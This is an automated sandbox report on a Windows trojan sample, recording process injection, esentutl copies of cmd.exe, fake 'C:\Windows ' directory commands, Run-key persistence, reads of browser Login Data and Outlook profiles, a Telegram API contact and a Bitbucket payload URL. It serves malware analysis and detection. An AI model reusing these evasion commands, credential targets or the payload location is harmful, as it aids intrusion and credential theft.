            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040E61C
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00416F6A
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 23_2_004123F1 SetUnhandledExceptionFilter,23_2_004123F1
            Source: C:\Users\Public\Libraries\yihfsboC.pif Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Memory allocated: C:\Users\Public\Libraries\yihfsboC.pif base: 400000 protect: page execute and read and write
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Memory allocated: C:\Users\Public\Libraries\yihfsboC.pif base: 400000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section unmapped: C:\Users\Public\Libraries\yihfsboC.pif base address: 400000
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Section unmapped: C:\Users\Public\Libraries\yihfsboC.pif base address: 400000
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Memory written: C:\Users\Public\Libraries\yihfsboC.pif base: 3EB008
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Memory written: C:\Users\Public\Libraries\yihfsboC.pif base: 2E7008
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Memory written: C:\Users\Public\Libraries\yihfsboC.pif base: 20E008
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Process created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
            Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Process created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15ACC
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: GetLocaleInfoA,0_2_02B1A7C4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15BD8
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: GetLocaleInfoA,0_2_02B1A810
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: GetLocaleInfoA,14_2_00417A20
            Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00398572
            Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,16_2_00396854
            Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00399310
            Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,19_2_00398572
            Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,19_2_00396854
            Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,19_2_00399310
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: GetLocaleInfoA,23_2_00417A20
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_02BC5ACC
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_02BC5BD7
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Code function: GetLocaleInfoA,24_2_02BCA810
            Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B1920C GetLocalTime,0_2_02B1920C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B1B78C GetVersionExA,0_2_02B1B78C
            Source: C:\Users\Public\Libraries\yihfsboC.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp Binary or memory strings: cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara matchFile source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR
            Source: C:\Users\Public\Libraries\yihfsboC.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\yihfsboC.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\yihfsboC.pif File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\Public\Libraries\yihfsboC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 Valid Accounts | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 311 Process Injection | 3 Software Packing | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 221 Masquerading | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Valid Accounts | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 41 Virtualization/Sandbox Evasion | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 311 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
            [Behavior graph: ID 1562871, Sample: EPTMAcgvNZ.exe, Start date: 26/11/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            EPTMAcgvNZ.exe | 63% | ReversingLabs | Win32.Trojan.ModiLoader |
            EPTMAcgvNZ.exe | 71% | Virustotal | | Browse
            EPTMAcgvNZ.exe | 100% | Avira | TR/AD.Nekark.pgnqj |
            EPTMAcgvNZ.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\Public\Libraries\Cobsfhiy.PIF | 100% | Avira | TR/AD.Nekark.pgnqj |
            C:\Users\Public\Libraries\Cobsfhiy.PIF | 100% | Joe Sandbox ML | |
            C:\Users\Public\Libraries\Cobsfhiy.PIF | 63% | ReversingLabs | Win32.Trojan.ModiLoader |
            C:\Users\Public\Libraries\yihfsboC.pif | 3% | ReversingLabs | |
            C:\Users\Public\alpha.pif | 0% | ReversingLabs | |
            C:\Users\Public\xpha.pif | 0% | ReversingLabs | |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
            http://www.microsoft.co~eE | 0% | Avira URL Cloud | safe |
            https://api.telegram.orgpj | 0% | Avira URL Cloud | safe |
            https://bbc-frontbucket-canary.prod-east.f | 0% | Avira URL Cloud | safe |
            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
            http://www.microsoft.cfdm | 0% | Avira URL Cloud | safe |
            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | 0% | Virustotal | | Browse

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            s3-w.us-east-1.amazonaws.com | 16.182.70.225 | true | false | | high
            bitbucket.org | 185.166.143.48 | true | false | | high
            api.telegram.org | 149.154.167.220 | true | false | | high
            checkip.dyndns.com | 132.226.8.169 | true | false | | high
            bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
            checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx | false | | high
http://checkip.dyndns.org/ | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
16.182.70.225 | s3-w.us-east-1.amazonaws.com | United States | unknown | unknown | false

IP
127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562871
Start date and time: 2024-11-26 08:23:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: EPTMAcgvNZ.exe (renamed because original name is a hash value)
Original Sample Name: 059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@34/11@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 212
• Number of non-executed functions: 42
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
02:24:39 | API Interceptor | 2x Sleep call for process: EPTMAcgvNZ.exe modified
02:25:00 | API Interceptor | 2x Sleep call for process: Cobsfhiy.PIF modified
04:03:08 | API Interceptor | 399635x Sleep call for process: yihfsboC.pif modified
08:24:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cobsfhiy C:\Users\Public\Cobsfhiy.url
08:24:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cobsfhiy C:\Users\Public\Cobsfhiy.url
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF">), ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):103
                                                                                                                Entropy (8bit):5.040869887509748
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMgDNM6fsbxJQKXvn:HRYFVmTWDyz9MqEx7/n
                                                                                                                MD5:8EB1493A9DE5730B408CFC787C954A6E
                                                                                                                SHA1:7E588245670B01A85218ABEF86655E5A39A69617
                                                                                                                SHA-256:47863E0A471F4CCD3DF71FE71465D647D44C22F284361C6CD8CDF486AC5709CC
                                                                                                                SHA-512:34063FBE80746C4B85D4A8FACD7AB64054269E99723B2EF2AB9B4B7DDB6A07346FF501012C2AD7EB5F2F639B0A6BD32172928A43323589D7B1AD04F34255AC5B
                                                                                                                Malicious:true
                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF"..IconIndex=915509..HotKey=5..
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):561958
                                                                                                                Entropy (8bit):6.968997844387319
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:gAabuLGiAvJSswdYvgB/CBXakJpLqQszzFG/oota3:0Kz0+dYvM/C4ZzzFG/Lta3
                                                                                                                MD5:F481AA81C109EF427F031D402F04F98E
                                                                                                                SHA1:E0D32E04CDCFF429DCD53AF6550DF64401F9B764
                                                                                                                SHA-256:6A5355D9405BBA24CD90E37409194027EF4D453A0387692586F71C4030AC0656
                                                                                                                SHA-512:4BD37DDA5109C852ADC3ACCD9B4859AFC799117526B72729BBB7F29979C771870BDB50AE3A85D73BF60DEC5721F452D05F50D561C77DCB78D66ADB9A3CA04D58
                                                                                                                Malicious:true
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1297920
                                                                                                                Entropy (8bit):7.351894430686878
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:uPHhFG0TMHw0kEWIo7rVTR8XzSz4FMzDVW1SKCDH7:uPBZIMJTmjSmM3UxAH7
                                                                                                                MD5:DC614075998696B44ADA8A2EED23FC03
                                                                                                                SHA1:911B29FF40B13F6935568153F178867E10946311
                                                                                                                SHA-256:059971FF3A7ED8438AE50F1AE60BC161E93C0B32F8A2B3C5A0E56BBFA05D9CD5
                                                                                                                SHA-512:ABD7C8F466B5C856A1A0862180598FBF32B9854EC4C4D6529C0FC3B45F642F538B2E52A5AD27C913F164B74306240BF84082D2DD69C8998A233C7379B749646B
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................(.......0....@..........................P...................@...........................`...(...0..........................lx..................................................Pg..8............................text............................... ..`.itext....... ...................... ..`.data........0......................@....bss.....:... ...........................idata...(...`...*..................@....tls....4............4...................rdata...............4..............@..@.reloc..lx.......z...6..............@..B.rsrc........0......................@..@.............P......................@..@................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3
                                                                                                                Entropy (8bit):1.584962500721156
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:L:L
                                                                                                                MD5:A0B6C3E24F6F2433B030951BC488F759
                                                                                                                SHA1:1D383314988E188C925A9B47065E1285E25551E3
                                                                                                                SHA-256:9B6DD0F55D1CEA37555DB317F53A0631F694BD46DF8018CC2AEED3D9E2F32F5F
                                                                                                                SHA-512:16E024531F95614599758CB3996E5A9303AF312912C7EADE0B27BD46979A6C0704E8D63D09BBBC81F94A3D762F8A256005DCA4A6C531BCD262A8583E7EE7A74F
                                                                                                                Malicious:false
                                                                                                                Preview:7..
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):62357
                                                                                                                Entropy (8bit):4.705712327109906
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
